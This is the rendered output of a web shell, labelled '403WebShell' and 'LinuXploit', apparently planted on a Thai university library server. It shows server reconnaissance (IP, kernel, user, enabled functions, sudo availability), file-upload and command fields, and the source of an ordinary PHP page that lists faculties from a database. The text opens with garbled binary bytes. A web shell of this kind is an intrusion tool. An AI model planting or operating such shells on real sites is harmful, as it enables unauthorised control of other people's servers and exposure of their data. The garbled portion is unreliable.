h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/lib/list_faculty.php
<?php include 'dbconnect.php';?>
<?php include 'header3.php';?>
<script type="text/javascript">

function getURL()
{
 if(document.getElementById('TI').checked) {
  //Search Title
 var searchStr= document.getElementById('searchterm').value;
 var Title= "TI ("
 var closetag= ")"
 var searchFull1= Title.concat(searchStr);
 var searchFull= searchFull1.concat(closetag);
 document.getElementById('searchterm').value = searchFull;
}
else if(document.getElementById('AU').checked) {
  //Search Author
 var searchStr= document.getElementById('searchterm').value;
 var Author= "AU ("
 var closetag= ")"
 var searchFull1= Author.concat(searchStr);
 var searchFull= searchFull1.concat(closetag);
 document.getElementById('searchterm').value = searchFull;
}


if(document.getElementById('defaultdb').value == "JN") {
  //Search Title
 var searchStr= document.getElementById('searchterm').value;
 var Title= "PT Academic Journal AND ("
 var closetag= ")"
 var searchFull1= Title.concat(searchStr);
 var searchFull= searchFull1.concat(closetag);
 document.getElementById('searchterm').value = searchFull;
}

 }
 
</script>

			<div class="banner-text-2 text-right">
				<div class="banner-bot-2">
					<h1><a href="#" class="logo text-wh editContent">ทรัพยากรสารสนเทศ</a></h1>
				</div>
			</div>
		</div>
		<!-- //banner -->
	</div>
	<!-- //home -->
	<p>&nbsp;</p>

	<!-- list_faculty -->
	<a id="list_faculty"></a>
	<div class="serives-w3pvt-mobi py-1" id="list_faculty">
		<div class="container py-xl-5 py-lg-3">
<?php
	$faculty_image = "images/" . "fac0000" . ".jpg";
	if (!file_exists($faculty_image)) {
		$faculty_image = "images/banner4.jpg";
	}
?>		
			<div class="title-bg text-center py-5 mb-5" style="background: url(<?php echo $faculty_image;?>) no-repeat center fixed;">
				<h3 class="tittle text-wh let mb-2 pt-sm-3" align="center" style="text-shadow: 0 0 0.3em #000000,0 0 0.5em #000000;">ทรัพยากรสารสนเทศ แยกตามคณะ, หลักสูตร</h3>
				<!--<p class="text-li mx-auto pb-sm-3">รายชื่อทรัพยากรสารสนเทศ แยกตามคณะ, หลักสูตร เช่น หนังสือ, วารสาร, E-Book, E-Journal, ฐานข้อมูลออนไลน์</p>-->
			</div>
			<div class="row welcome-bottom pt-4">
<?php
	$dbName = "newbook";
	$conn = mysqli_connect($serverName,$userName,$userPassword,$dbName);
	mysqli_set_charset($conn,"utf8");
	$sql_faculty = "SELECT DISTINCT faculty.faculty_id, faculty.faculty_name, faculty_color, faculty_font_color FROM faculty INNER JOIN program ON faculty.faculty_id=program.faculty_id ORDER BY faculty.faculty_id ASC";
	$query_faculty = mysqli_query($conn,$sql_faculty);
	while($result_faculty=mysqli_fetch_array($query_faculty,MYSQLI_ASSOC)) {	
?>
				<div class="col-md-4 welcome-grid" style="margin-bottom: 50px;">
					<!--<span class="fa fa-briefcase"></span>-->
<?php
		//$img_url = "https://arit.skru.ac.th/arit/images/DBonline/" . $result["logo2"];	
?>					
                    <!--<img src="<?php //echo $img_url;?>" height="50">	-->				
					<!--<a href="resource_faculty.php?type_code=<?php //echo $result_faculty["faculty_id"];?>#list_resource_faculty"><h4 class="my-3"><font color="#00CC99"><b><?php //echo $result_faculty["faculty_name"];?></b></font></h4></a>-->
					<a href="resource_faculty.php?type_code=<?php echo $result_faculty["faculty_id"];?>#list_resource_faculty"><button type="button" class="btn btn-secondary" style="background-color: <?php echo $result_faculty["faculty_color"];?>;color:<?php echo $result_faculty["faculty_font_color"];?>;"><?php echo $result_faculty["faculty_name"];?></button></a>
				</div>
<?php
	} //end while
?>			
				<!--<div class="col-md-4 welcome-grid">
					<span class="fa fa-briefcase"></span>
					<h4 class="my-3">et quasi</h4>
					<p>Ut enim ad minima veniam, quis nostrum ullam corporis suscipit laboriosam.</p>
				</div>
				<div class="col-md-4 welcome-grid my-md-0 my-4">
					<span class="fa fa-fighter-jet"></span>
					<h4 class="my-3">beatae vita</h4>
					<p>Ut enim ad minima veniam, quis nostrum ullam corporis suscipit laboriosam.</p>
				</div>
				<div class="col-md-4 welcome-grid">
					<span class="fa fa-globe"></span>
					<h4 class="my-3">sed quian</h4>
					<p>Ut enim ad minima veniam, quis nostrum ullam corporis suscipit laboriosam.</p>
				</div>-->
			</div>
			<!--<div class="row welcome-bottom mb-xl-4 mt-md-5 my-md-0 my-4">
				<div class="col-md-4 welcome-grid">
					<span class="fa fa-ship"></span>
					<h4 class="my-3">numqu eiu</h4>
					<p>Ut enim ad minima veniam, quis nostrum ullam corporis suscipit laboriosam.</p>
				</div>
				<div class="col-md-4 welcome-grid my-md-0 my-4">
					<span class="fa fa-bus"></span>
					<h4 class="my-3">modi tem</h4>
					<p>Ut enim ad minima veniam, quis nostrum ullam corporis suscipit laboriosam.</p>
				</div>
				<div class="col-md-4 welcome-grid">
					<span class="fa fa-shopping-basket"></span>
					<h4 class="my-3">pora inci</h4>
					<p>Ut enim ad minima veniam, quis nostrum ullam corporis suscipit laboriosam.</p>
				</div>
			</div>-->
		</div>
	</div>
	<!-- จบ list_faculty -->





<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit